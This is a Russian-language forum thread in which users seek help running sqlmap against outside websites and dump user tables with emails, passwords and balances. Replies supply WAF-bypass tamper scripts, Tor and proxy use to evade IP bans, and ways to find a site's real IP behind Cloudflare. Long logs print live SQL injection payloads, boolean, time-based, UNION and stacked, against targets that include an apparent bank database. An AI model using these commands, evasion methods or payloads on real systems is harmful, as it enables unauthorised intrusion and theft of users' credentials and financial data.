Вопросы по SQLMap

polzunki · 30 Jan 2021

Приветствую
Что можно сделать, чтобы обойти это? После определенного кол-ва запросов к сайту, сайт блокирует ip с которого к нему обращаются, и все попытки проверки обрубаются. Запрос к мапу выглядит так: sqlmap.py -u "https://site.com" --time-sec=32 --timeout=180 --identify-waf --force-ssl --random-agent -v 3 --technique=BU --skip="referrer" --tamper="between,randomcase,space2comment" --level 3 --risk 3 --dbs

d_dwacawaca · 30 Jan 2021

polzunki said: ↑

Приветствую
Что можно сделать, чтобы обойти это? После определенного кол-ва запросов к сайту, сайт блокирует ip с которого к нему обращаются, и все попытки проверки обрубаются. Запрос к мапу выглядит так: sqlmap.py -u "https://site.com" --time-sec=32 --timeout=180 --identify-waf --force-ssl --random-agent -v 3 --technique=BU --skip="referrer" --tamper="between,randomcase,space2comment" --level 3 --risk 3 --dbs

View attachment 12400
Click to expand...

Используй прокси, пусти трафик через ТОР
Попробуй с того же IP, но почисти куки.

Duble · 10 Feb 2021

Добрый день, подскажите плз как сделать так что бы sqlmap нашел определенного юзера по id
Мой запрос
Code:
 users -C id,email,password,money  --dump
Мне допустим надо юзер с ID 123

Baskin-Robbins · 10 Feb 2021

Duble said: ↑
Добрый день, подскажите плз как сделать так что бы sqlmap нашел определенного юзера по id
Мой запрос
Code:
 users -C id,email,password,money  --dump
Мне допустим надо юзер с ID 123
Click to expand...
karkajoi said: ↑

--where="email='[email protected]'" так будет работать
Click to expand...
joelblack said: ↑
Code:
--where "id IN (1,3)"
Click to expand...

brown · 14 Feb 2021

[12:51:44] [INFO] fetching database names
[12:51:44] [INFO] fetching number of databases
[12:51:44] [PAYLOAD] -3870
you provided a HTTP Cookie header value, while target URL provides its own cooki
es within HTTP Set-Cookie header which intersect with yours. Do you want to merg
e them in further requests? [Y/n] Y
[12:51:44] [DEBUG] used the default behavior, running in batch mode
[12:51:45] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema
_name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51-- tCKN
[12:51:47] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema
_name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48-- tCKN
[12:51:53] [PAYLOAD] -7120' OR ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema
_name)) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9-- tCKN
[12:51:54] [INFO] retrieved:
[12:51:54] [INFO] retrieved:

Кто сталкивался?

F1shka · 15 Feb 2021

[12:51:44] [DEBUG] used the default behavior, running in batch mode
Click to expand...

Параметры с которыми запускаешь SQLMAP? Параметр --batch всегда жмет за тебя Y, --charset=utf-8 присваивает кодировку в UTF-8. Попробуй так:
Code:
sqlmap -u http://site[.]ru/ --batch --charset=utf-8 --threads=10 --risk=3 --level=5 --dbs --random-agent --hex

Duble · 19 Feb 2021

Code:

[19:29:31] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[19:29:31] [PAYLOAD] -6241/**/oR/**/13/**/BEtWeeN/**/13/**/anD/**/13
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -8727/**/oR/**/13/**/betweEN/**/74/**/AnD/**/74
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -1511/**/Or/**/74/**/BeTwEEn/**/49/**/ANd/**/49
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -6928/**/oR/**/49/**/beTwEEn/**/49/**/aNd/**/49
[19:29:32] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:32] [WARNING] false positive or unexploitable injection point detected
[19:29:32] [WARNING] URI parameter '#1*' does not seem to be injectable
[19:29:32] [CRITICAL] all tested parameters do not appear to be injectable
[19:29:32] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 681 times

[*] ending @ 19:29:32 /2021-02-19/

В чем проблема?

Code:

--url "http://site.com/?id=1*" --random-agent --tamper=between,randomcase,space2comment,luanginx --risk 3 --level 5 -v 3 --dbms=mysql --time-sec=32 --timeout=180 --identify-waf --batch  --hex --drop-set-cookie --text-only

До этого крутилось все норм, сейчас на сайте поставлен waf как я понимаю. На сайте так же есть Cloudflare.
Подскажите как быть?
[IMG]

Не обнаруживает базы данных
[IMG]

brown · 20 Feb 2021

Duble said: ↑

Code:

[19:29:31] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[19:29:31] [PAYLOAD] -6241/**/oR/**/13/**/BEtWeeN/**/13/**/anD/**/13
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -8727/**/oR/**/13/**/betweEN/**/74/**/AnD/**/74
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -1511/**/Or/**/74/**/BeTwEEn/**/49/**/ANd/**/49
[19:29:31] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:31] [PAYLOAD] -6928/**/oR/**/49/**/beTwEEn/**/49/**/aNd/**/49
[19:29:32] [DEBUG] got HTTP error code: 503 ('Service Temporarily Unavailable')
[19:29:32] [WARNING] false positive or unexploitable injection point detected
[19:29:32] [WARNING] URI parameter '#1*' does not seem to be injectable
[19:29:32] [CRITICAL] all tested parameters do not appear to be injectable
[19:29:32] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 681 times

[*] ending @ 19:29:32 /2021-02-19/

В чем проблема?

Code:

--url "http://site.com/?id=1*" --random-agent --tamper=between,randomcase,space2comment,luanginx --risk 3 --level 5 -v 3 --dbms=mysql --time-sec=32 --timeout=180 --identify-waf --batch  --hex --drop-set-cookie --text-only

До этого крутилось все норм, сейчас на сайте поставлен waf как я понимаю. На сайте так же есть Cloudflare.
Подскажите как быть?
[IMG]

Не обнаруживает базы данных
[IMG]

Click to expand...

Теперь ищи реальный ИП сайта.Смотри DNS записи

polzunki · 1 Mar 2021

Здравствуйте. Есть ссылка вида: http://site.com/index.php?id=image/quickview&host_id=2352
При запуске этой команды:
Code:
sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352"  --proxy-file=C:\proxy.txt  --threads=10 --timeout=180  --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment,space2hash,space2mysqlblank" --level 5 --risk 3 --dbs
Тамперы подставляются к image/quickview
Возможно ли как-то указать мапе, чтобы проверка шла через host_id=2352?

erwerr2321 · 1 Mar 2021

@polzunki

* - указатель точки инъекции

Code:

sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352*" blah-blah-blah

polzunki · 1 Mar 2021

ms13 said: ↑
@polzunki

* - указатель точки инъекции

Code:

sqlmap.py -u "http://site.com/index.php?id=image/quickview&host_id=2352*" blah-blah-blah
Click to expand...
Благодарю. Вроде получилось, но по итогу получаю это:

URI parameter '#1*' is not injectable

Откуда берётся #1, если этого нет в таргете?

erwerr2321 · 1 Mar 2021

polzunki said: ↑

Откуда берётся #1, если этого нет в таргете?
Click to expand...

это означает, что в указанном параметре под номером 1 нет инъекции, то есть с помощью * можно указывать несколько параметров.
а если вы хотите увидеть, что отправляется в запросах, то добавьте ключ -v - Уровень вербальности: 1-6 (по умолчанию 1)
но лучше начните с мануала программы ( он есть и на русском ) или даже с этого!

Duble · 1 Mar 2021

Cорян за возможно глупый вопрос, просто не сталкивался со скулей в куках.
Как правильно кормить мапу?

content_copyGET /pr/110 HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Cookie: __cfduid=d98d5bb0d7fe33de10e5507d3ab069d8f1614512699;PHPSESSID=duh4mooe1nue85unesnfmpdir5;nova=hryhvdn5lco00000000000000000000;cf_ob_info=520:628a0e9e19008b4a:KBP'%20RLIKE%20(SELECT%20(CASE%20WHEN%20(1%2B1-2%2B000610=2%2B2-4%2B000610)%20THEN%201%20ELSE%200x28%20END))%20--%20;cf_use_ob=0
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: site.com
Connection: Keep-alive
Click to expand...

Duble · 7 Mar 2021

Подскажите в чем проблема?

sqlmap --level 5 --risk 3 --random-agent --threads 1 --url "https://site.su/ajax/ajax.php" --batch --time-sec=400 -v 3 --hex --data="arr[hours]=19&arr[id_film]=10166*&arr[minutes]=44&
method=1.32" --tamper=space2comment,randomcase --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.3.2#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:04:44 /2021-03-07/

[13:04:44] [DEBUG] cleaning up configuration parameters
[13:04:45] [INFO] loading tamper module 'space2comment'
[13:04:45] [INFO] loading tamper module 'randomcase'
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y
[13:04:45] [DEBUG] used the default behavior, running in batch mode
[13:04:45] [INFO] loading tamper module 'space2dash'
[13:04:45] [DEBUG] setting the HTTP timeout
[13:04:45] [DEBUG] loading random HTTP User-Agent header(s) from file '/usr/share/sqlmap/txt/user-agents.txt'
[13:04:45] [INFO] fetched random HTTP User-Agent header value 'Opera/9.01 (Windows NT 5.0; U; en)' from file '/usr/share/sqlmap/txt/user-agents.txt'
[13:04:45] [DEBUG] creating HTTP requests opener object
[13:04:46] [DEBUG] setting the HTTP Referer header to the target URL
[13:04:46] [DEBUG] setting the HTTP Host header to the target URL
custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[13:04:46] [DEBUG] used the default behavior, running in batch mode
[13:04:47] [INFO] resuming back-end DBMS 'mysql'
[13:04:47] [DEBUG] resolving hostname 'site.su'
[13:04:48] [INFO] testing connection to the target URL
[13:04:52] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: arr[hours]=19&arr[id_film]=10166' AND SLEEP(400) AND 'kNCw'='kNCw&arr[minutes]=44&method=1.32
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[13:04:52] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:04:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.16.1, PHP 7.3.16
back-end DBMS: MySQL >= 5.0.12
[13:04:52] [INFO] fetching database names
[13:04:52] [INFO] fetching number of databases
[13:04:52] [PAYLOAD] 10166
[13:04:53] [INFO] resumed: ?\xff
[13:04:53] [DEBUG] performed 0 queries in 0.03 seconds
[13:04:53] [ERROR] unable to retrieve the number of databases
[13:04:53] [INFO] falling back to current database
[13:04:53] [INFO] fetching current database
[13:04:53] [PAYLOAD] 10166'/**/aND/**/7166=If((orD(Mid((heX(IfNULL(cAsT(DAtABAsE()/**/As/**/CHaR),0x20))),1,1))>66),SLEEp(400),7166)/**/aND/**/'TrEu'='TrEu
[13:04:53] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
[13:05:20] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[13:05:21] [PAYLOAD] 10166'/**/ANd/**/7166=iF((oRd(MId((HeX(iFNULL(caSt(DATAbAsE()/**/aS/**/chAR),0x20))),1,1))>52),sLEEp(400),7166)/**/ANd/**/'TrEu'='TrEu
[13:05:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[13:05:51] [PAYLOAD] 10166'/**/ANd/**/7166=iF((oRD(MiD((hEX(iFNULL(CAst(DAtAbAse()/**/As/**/ChaR),0x20))),1,1))>56),sleEp(400),7166)/**/ANd/**/'TrEu'='TrEu
[13:06:22] [PAYLOAD] 10166'/**/And/**/7166=iF((oRD(mID((Hex(iFNULL(caST(daTabaSe()/**/As/**/CHaR),0x20))),1,1))>64),slEep(400),7166)/**/And/**/'TrEu'='TrEu
[13:06:54] [PAYLOAD] 10166'/**/aNd/**/7166=iF((orD(miD((hEX(iFNULL(CAsT(daTAbase()/**/aS/**/ChaR),0x20))),1,1))>65),SleEp(400),7166)/**/aNd/**/'TrEu'='TrEu
[13:07:24] [PAYLOAD] 10166'/**/aND/**/7166=iF((Ord(Mid((hEx(iFNULL(caSt(daTABaSE()/**/aS/**/Char),0x20))),1,1))!=66),SleeP(400),7166)/**/aND/**/'TrEu'='TrEu
[13:07:58] [ERROR] invalid character detected. retrying..
[13:07:58] [PAYLOAD] 10166'/**/aNd/**/7166=iF((Ord(MId((Hex(iFNULL(CAst(DatAbaSE()/**/aS/**/cHAR),0x20))),1,1))>66),SleEP(400),7166)/**/aNd/**/'TrEu'='TrEu
[13:08:32] [PAYLOAD] 10166'/**/And/**/7166=iF((ORd(mId((Hex(iFNULL(cAst(databaSE()/**/As/**/cHAr),0x20))),1,1))>97),sLEEp(400),7166)/**/And/**/'TrEu'='TrEu
[13:09:12] [PAYLOAD] 10166'/**/And/**/7166=If((Ord(MiD((heX(IfNULL(CAst(DataBAsE()/**/As/**/ChAR),0x20))),1,1))>101),SlEep(400),7166)/**/And/**/'TrEu'='TrEu
[13:09:43] [PAYLOAD] 10166'/**/And/**/7166=If((oRd(MId((hEx(IfNULL(casT(dAtabAse()/**/As/**/cHAR),0x20))),1,1))>119),slEEP(400),7166)/**/And/**/'TrEu'='TrEu
[13:10:14] [PAYLOAD] 10166'/**/ANd/**/7166=iF((oRD(MiD((hEX(iFNULL(caST(dAtABasE()/**/aS/**/ChAr),0x20))),1,1))>120),sLeEP(400),7166)/**/ANd/**/'TrEu'='TrEu
[13:10:44] [INFO] retrieved:
[13:10:44] [DEBUG] performed 11 queries in 351.53 seconds
[13:10:44] [CRITICAL] unable to retrieve the database names

[*] ending @ 13:10:44 /2021-03-07/
Click to expand...

d_dwacawaca · 7 Mar 2021

Duble said: ↑

Подскажите в чем проблема?
Click to expand...

Сделай логирование в файл ( -t logfile.txt) и руками проверь запросы, может WAF на database() срабатывает

jonni80 · 22 Mar 2021

Приветствую. подскажите что не дает далее базу размотать.

Database: mysql
Table: Organization
[18 columns]
+------------------+---------+
| Column | Type |
+------------------+---------+
| aa | numeric |
| auid | numeric |
| chromosome_id | numeric |
| e_postaadres | numeric |
| evadres | numeric |
| fjalekalimi | numeric |
| ip | numeric |
| isbn | numeric |
| lastpost | numeric |
| main_module | numeric |
| mot_de_passe_bdd | numeric |
| myname | numeric |
| namaakun | numeric |
| ordernumber | numeric |
| parola | numeric |
| plugin_id | numeric |
| s_id | numeric |
| usr_n | numeric |
+------------------+---------+

sqlmap -u "https://10.10.10.10/index.php?action=login&controller=User" --host="site.test.com" --data="login=1'&password=g00dPa%24%24w0rD" --dbms=mysql -p login --risk 3 --random-agent -D mysql -T Organization -C mot_de_passe_bdd,parola,usr_n,s_id,e_postaadres,ip,lastpost -v3 --dump

выкидывает;
[13:50:52] [PAYLOAD] 1' AND (SELECT 9734 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM mysql.Organization),1,1))>9,0,5)))))yXMR)-- bIfc
[13:50:52] [INFO] retrieved:
[13:50:52] [DEBUG] performed 3 queries in 18.58 seconds
[13:50:52] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:50:52] [WARNING] unable to retrieve the number of column(s) 'e_postaadres,ip,lastpost,mot_de_passe_bdd,parola,s_id,usr_n' entries for table 'Organization' in database 'mysql'
[13:50:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.10'

[*] ending @ 13:50:52 /2021-03-22/

до таблиц дошел, а с колонками проблема . и подставлял --no-cast' or switch '--hex' идр.
Payload руками перебирать ,пока не сильно понимаю. прошу помощь

dddg33 · 6 Apr 2021

Добрый день! Подскажите плс в чем может быть проблема?

Code:

sqlmap.py --random-agent -u "http://site.com/ShoppingPage.asp?CateID=7" -v 3 --batch -D SkhlmcPTBankDB --dump --no-cast --tamper=between,randomcase,space2comment,luanginx --time-sec=10 --threads=10

Получаю следующие

Code:

[03:59:00] [DEBUG] cleaning up configuration parameters
[03:59:00] [INFO] loading tamper module 'between'
[03:59:00] [INFO] loading tamper module 'randomcase'
[03:59:00] [INFO] loading tamper module 'space2comment'
[03:59:00] [INFO] loading tamper module 'luanginx'
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y
[03:59:00] [DEBUG] used the default behavior, running in batch mode
[03:59:00] [WARNING] using too many tamper scripts is usually not a good idea
[03:59:00] [DEBUG] setting the HTTP timeout
[03:59:00] [DEBUG] setting the HTTP User-Agent header
[03:59:00] [DEBUG] loading random HTTP User-Agent header(s) from file 'E:\sqlmap\data\txt\user-agents.txt'
[03:59:01] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20061201 Firefox/2.0.0.10 (Ubuntu-feisty)' from file 'E:\sqlmap\data\txt\user-agents.txt'
[03:59:01] [DEBUG] creating HTTP requests opener object
[03:59:02] [INFO] resuming back-end DBMS 'microsoft sql server'
[03:59:02] [DEBUG] resolving hostname 'eshop.antibac-intl.com'
[03:59:02] [INFO] testing connection to the target URL
[03:59:03] [DEBUG] declared web page charset 'utf-8'
you have not declared cookie(s), while server wants to set its own ('ASPSESSIONIDQCTCBDAQ=BEHFEANBBCL...JDFNEOLDOF'). Do you want to use those [Y/n] Y
[03:59:04] [DEBUG] used the default behavior, running in batch mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: CateID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CateID=7' AND 4290=4290 AND 'EMyv'='EMyv
    Vector: AND [INFERENCE]

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: CateID=7' AND 1088 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1088=1088) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'AjKx'='AjKx
    Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: CateID=7';WAITFOR DELAY '0:0:10'--
    Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: CateID=7' WAITFOR DELAY '0:0:10'--
    Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: CateID=7' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+CHAR(69)+CHAR(111)+CHAR(72)+CHAR(84)+CHAR(86)+CHAR(122)+CHAR(108)+CHAR(74)+CHAR(103)+CHAR(102)+CHAR(101)+CHAR(111)+CHAR(119)+CHAR(67)+CHAR(87)+CHAR(99)+CHAR(88)+CHAR(108)+CHAR(97)+CHAR(115)+CHAR(101)+CHAR(65)+CHAR(66)+CHAR(116)+CHAR(85)+CHAR(119)+CHAR(88)+CHAR(115)+CHAR(70)+CHAR(84)+CHAR(112)+CHAR(71)+CHAR(89)+CHAR(85)+CHAR(82)+CHAR(83)+CHAR(98)+CHAR(118)+CHAR(109)+CHAR(109)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113),NULL,NULL-- jDXf
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]
---
[03:59:04] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[03:59:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 7 or 2008 R2
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
[03:59:04] [INFO] fetching tables for database: SkhlmcPTBankDB
[03:59:06] [DEBUG] resuming configuration option 'string' ('HK')
[03:59:06] [PAYLOAD] 7'/**/Union/**/AlL/**/SEleCT/**/nULl,nULl,nULl,nULl,nULl,nULl,ChaR(113)+ChaR(107)+ChaR(98)+ChaR(120)+ChaR(113)+(SEleCT/**/SkhlmcPTBankDB..sysusers.name+ChaR(46)+SkhlmcPTBankDB..sysobjects.name/**/As/**/table_name/**/FrOM/**/SkhlmcPTBankDB..sysobjects/**/innER/**/joiN/**/SkhlmcPTBankDB..sysusers/**/oN/**/SkhlmcPTBankDB..sysobjects.uid=SkhlmcPTBankDB..sysusers.uid/**/wHeRE/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(ChaR(117),ChaR(118))/**/FOr/**/JSoN/**/AUTO,/**/iNCLUDE_nULl_VALUES)+ChaR(113)+ChaR(112)+ChaR(112)+ChaR(107)+ChaR(113),nULl,nULl--/**/pqUM
[03:59:06] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:07] [PAYLOAD] 7'/**/UniOn/**/aLl/**/sElecT/**/nuLl,nuLl,nuLl,nuLl,nuLl,nuLl,ChaR(113)+ChaR(107)+ChaR(98)+ChaR(120)+ChaR(113)+COUNt(SkhlmcPTBankDB..sysusers.name+ChaR(46)+SkhlmcPTBankDB..sysobjects.name/**/aS/**/table_name)+ChaR(113)+ChaR(112)+ChaR(112)+ChaR(107)+ChaR(113),nuLl,nuLl/**/frOM/**/SkhlmcPTBankDB..sysobjects/**/inNEr/**/Join/**/SkhlmcPTBankDB..sysusers/**/On/**/SkhlmcPTBankDB..sysobjects.uid=SkhlmcPTBankDB..sysusers.uid/**/wHERE/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(ChaR(117),ChaR(118))--/**/OJqX
[03:59:08] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:08] [WARNING] the SQL query provided does not return any output
[03:59:08] [PAYLOAD] 7
[03:59:10] [PAYLOAD] 7'/**/aNd/**/3241/**/iN/**/(seLECt/**/(CHaR(113)+CHaR(107)+CHaR(98)+CHaR(120)+CHaR(113)+(seLECt/**/COUnt(SkhlmcPTBankDB..sysusers.name+CHaR(46)+SkhlmcPTBankDB..sysobjects.name/**/aS/**/table_name)/**/FroM/**/SkhlmcPTBankDB..sysobjects/**/iNNER/**/JOiN/**/SkhlmcPTBankDB..sysusers/**/On/**/SkhlmcPTBankDB..sysobjects.uid=SkhlmcPTBankDB..sysusers.uid/**/wheRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(CHaR(117),CHaR(118)))+CHaR(113)+CHaR(112)+CHaR(112)+CHaR(107)+CHaR(113)))/**/aNd/**/'qpCU'='qpCU
[03:59:11] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:11] [WARNING] the SQL query provided does not return any output
[03:59:12] [PAYLOAD] 7'/**/uNiOn/**/All/**/selEct/**/NUll,NUll,NUll,NUll,NUll,NUll,cHAR(113)+cHAR(107)+cHAR(98)+cHAR(120)+cHAR(113)+(selEct/**/table_schema+cHAR(46)+table_name/**/fROM/**/information_schema.tables/**/WHeRE/**/table_catalog=cHAR(83)+cHAR(107)+cHAR(104)+cHAR(108)+cHAR(109)+cHAR(99)+cHAR(80)+cHAR(84)+cHAR(66)+cHAR(97)+cHAR(110)+cHAR(107)+cHAR(68)+cHAR(66)/**/fOr/**/JSON/**/AUTO,/**/INCLUDE_NUll_VALUES)+cHAR(113)+cHAR(112)+cHAR(112)+cHAR(107)+cHAR(113),NUll,NUll--/**/XTJu
[03:59:12] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:13] [WARNING] reflective value(s) found and filtering out
[03:59:13] [PAYLOAD] 7'/**/unIOn/**/All/**/SElEcT/**/Null,Null,Null,Null,Null,Null,CHar(113)+CHar(107)+CHar(98)+CHar(120)+CHar(113)+(SElEcT/**/name/**/FrOM/**/SkhlmcPTBankDB..sysobjects/**/WhERe/**/xtype=CHar(85)/**/fOr/**/JSON/**/AUTO,/**/INCLUDE_Null_VALUES)+CHar(113)+CHar(112)+CHar(112)+CHar(107)+CHar(113),Null,Null--/**/oEuh
[03:59:14] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:14] [PAYLOAD] 7'/**/uNiOn/**/ALl/**/SElecT/**/Null,Null,Null,Null,Null,Null,ChaR(113)+ChaR(107)+ChaR(98)+ChaR(120)+ChaR(113)+COUnT(name)+ChaR(113)+ChaR(112)+ChaR(112)+ChaR(107)+ChaR(113),Null,Null/**/FrOm/**/SkhlmcPTBankDB..sysobjects/**/Where/**/xtype=ChaR(85)--/**/jzSk
[03:59:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:15] [WARNING] the SQL query provided does not return any output
[03:59:15] [PAYLOAD] 7'/**/ANd/**/6591/**/In/**/(seLEct/**/(chAR(113)+chAR(107)+chAR(98)+chAR(120)+chAR(113)+(seLEct/**/CoUNT(name)/**/FROm/**/SkhlmcPTBankDB..sysobjects/**/WhERe/**/xtype=chAR(85))+chAR(113)+chAR(112)+chAR(112)+chAR(107)+chAR(113)))/**/ANd/**/'SuZW'='SuZW
[03:59:16] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:16] [WARNING] the SQL query provided does not return any output
[03:59:16] [INFO] fetching number of tables for database 'SkhlmcPTBankDB'
[03:59:16] [PAYLOAD] 7'/**/AnD/**/UniCODE(sUBstRInG((SeLeCt/**/ltriM(StR(cOUnT(name)))/**/fRoM/**/SkhlmcPTBankDB..sysobjects/**/wheRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(CHar(117),CHar(118))),1,1))/**/NOt/**/BETWEen/**/0/**/AnD/**/51/**/AnD/**/'dxUf'='dxUf
[03:59:17] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:17] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[03:59:17] [PAYLOAD] 7'/**/ANd/**/UnIcODe(sUbstRIng((SELeCT/**/LtRim(stR(cOunT(name)))/**/FRoM/**/SkhlmcPTBankDB..sysobjects/**/wHeRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(ChAR(117),ChAR(118))),1,1))/**/Not/**/bEtwEeN/**/0/**/ANd/**/48/**/ANd/**/'dxUf'='dxUf
[03:59:18] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:18] [PAYLOAD] 7'/**/AnD/**/UnIcODE(SUBstRIng((sELect/**/LtRim(sTr(coUNt(name)))/**/FRoM/**/SkhlmcPTBankDB..sysobjects/**/wheRE/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(chAr(117),chAr(118))),1,1))/**/NOt/**/bETweEN/**/0/**/AnD/**/9/**/AnD/**/'dxUf'='dxUf
[03:59:19] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:19] [INFO] retrieved:
[03:59:19] [DEBUG] performed 3 queries in 2.67 seconds
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[03:59:19] [DEBUG] used the default behavior, running in batch mode
[03:59:19] [PAYLOAD] 7'/**/iF(UNICOde(sUbstrInG((SELEcT/**/lTRiM(StR(Count(name)))/**/FroM/**/SkhlmcPTBankDB..sysobjects/**/whERe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(cHAR(117),cHAR(118))),1,1))/**/noT/**/beTWeen/**/0/**/aND/**/51)/**/WAITFOR/**/DELAY/**/'0:0:10'--
[03:59:19] [WARNING] time-based comparison requires larger statistical model, please wait.................. (done)
[03:59:35] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:35] [PAYLOAD] 7'/**/If(uNIcODE(SUbSTriNg((sELEct/**/LtrIM(stR(COunT(name)))/**/FroM/**/SkhlmcPTBankDB..sysobjects/**/wHere/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(ChAr(117),ChAr(118))),1,1))/**/noT/**/betWEEN/**/0/**/AnD/**/48)/**/WAITFOR/**/DELAY/**/'0:0:10'--
[03:59:35] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[03:59:36] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:36] [PAYLOAD] 7'/**/iF(UnicOdE(SubString((SElECt/**/lTRim(sTr(cOuNT(name)))/**/fRoM/**/SkhlmcPTBankDB..sysobjects/**/wheRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(Char(117),Char(118))),1,1))/**/Not/**/BEtwEEn/**/0/**/AnD/**/9)/**/WAITFOR/**/DELAY/**/'0:0:10'--
[03:59:37] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:37] [INFO] retrieved:
[03:59:37] [DEBUG] performed 3 queries in 17.57 seconds
[03:59:37] [INFO] resumed: 0
